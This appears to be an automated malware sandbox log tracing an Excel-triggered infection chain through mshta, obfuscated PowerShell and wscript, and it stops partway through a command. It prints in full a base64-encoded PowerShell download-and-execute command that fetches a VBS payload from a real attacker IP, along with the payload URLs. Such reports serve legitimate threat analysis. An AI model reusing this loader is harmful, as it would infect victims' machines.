                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:32 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:32 UTC | 106 | IN | Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              2 | 192.168.2.22 | 49166 | 24.199.88.84 | 443 | 3404 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:50 UTC | 462 | OUT | GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:51 UTC | 485 | IN | HTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:51 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:51 UTC | 106 | IN | Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              3 | 192.168.2.22 | 49169 | 24.199.88.84 | 443 | 1884 | C:\Windows\System32\mshta.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:53 UTC | 486 | OUT | GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:54 UTC | 485 | IN | HTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:53 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:54 UTC | 106 | IN | Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              4 | 192.168.2.22 | 49171 | 216.58.212.174 | 443 | 204 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:56 UTC | 121 | OUT | GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                              Host: drive.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:57 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 06:39:56 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Xfz4EpkDFKpN46O-dpM8PA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              5 | 192.168.2.22 | 49172 | 142.250.186.97 | 443 | 204 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:59 UTC | 139 | OUT | GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:40:02 UTC | 4906 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2239109
                                                                                              Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                              X-GUploader-UploadID: AHmUCY36FRB9jxr1pEWjXVitgUXIp9nSIwePHiw1bgPgligXYFCTjLjrojlKyaVXd96w9h8bYcTVSe3x-Q
                                                                                              Date: Thu, 24 Oct 2024 06:40:02 GMT
                                                                                              Expires: Thu, 24 Oct 2024 06:40:02 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=WqxmdA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                              Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                              Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                              2024-10-24 06:40:02 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                              Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49173 | 216.58.212.174 | 443 | 3900 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 06:40:07 UTC | 121 | OUT | GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                              Host: drive.google.com
                                                                                              Connection: Keep-Alive
2024-10-24 06:40:08 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 24 Oct 2024 06:40:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mle0fBkQmDcx9q2ZM00ZWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49174 | 142.250.186.97 | 443 | 3900 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 06:40:09 UTC | 139 | OUT | GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
2024-10-24 06:40:12 UTC | 4906 | IN | HTTP/1.1 200 OK
                                                                                              Content-Type: image/jpeg
                                                                                              Content-Security-Policy: sandbox
                                                                                              Content-Security-Policy: default-src 'none'
                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                              X-Content-Security-Policy: sandbox
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Credentials: false
                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2239109
                                                                                              Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                              X-GUploader-UploadID: AHmUCY2aL8-CywcUcQZr3JV20z9OplPkTkTczxiCSmx0AGa7ol2xJMH0ecrAFI1t_lnv6q7fwt88m2GWZw
                                                                                              Date: Thu, 24 Oct 2024 06:40:12 GMT
                                                                                              Expires: Thu, 24 Oct 2024 06:40:12 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=WqxmdA==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Target ID:0
                                                                                              Start time:02:39:05
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x13fee0000
                                                                                              File size:28'253'536 bytes
                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:4
                                                                                              Start time:02:39:28
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                              Imagebase:0x13f6e0000
                                                                                              File size:13'824 bytes
                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:02:39:33
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:02:39:37
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
                                                                                              Imagebase:0x13fcb0000
                                                                                              File size:443'392 bytes
                                                                                              MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:02:39:40
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
                                                                                              Imagebase:0x13f320000
                                                                                              File size:2'758'280 bytes
                                                                                              MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:02:39:41
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
                                                                                              Imagebase:0x13fde0000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:02:39:46
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
                                                                                              Imagebase:0xff5e0000
                                                                                              File size:168'960 bytes
                                                                                              MD5 hash:045451FA238A75305CC26AC982472367
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:02:39:47
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 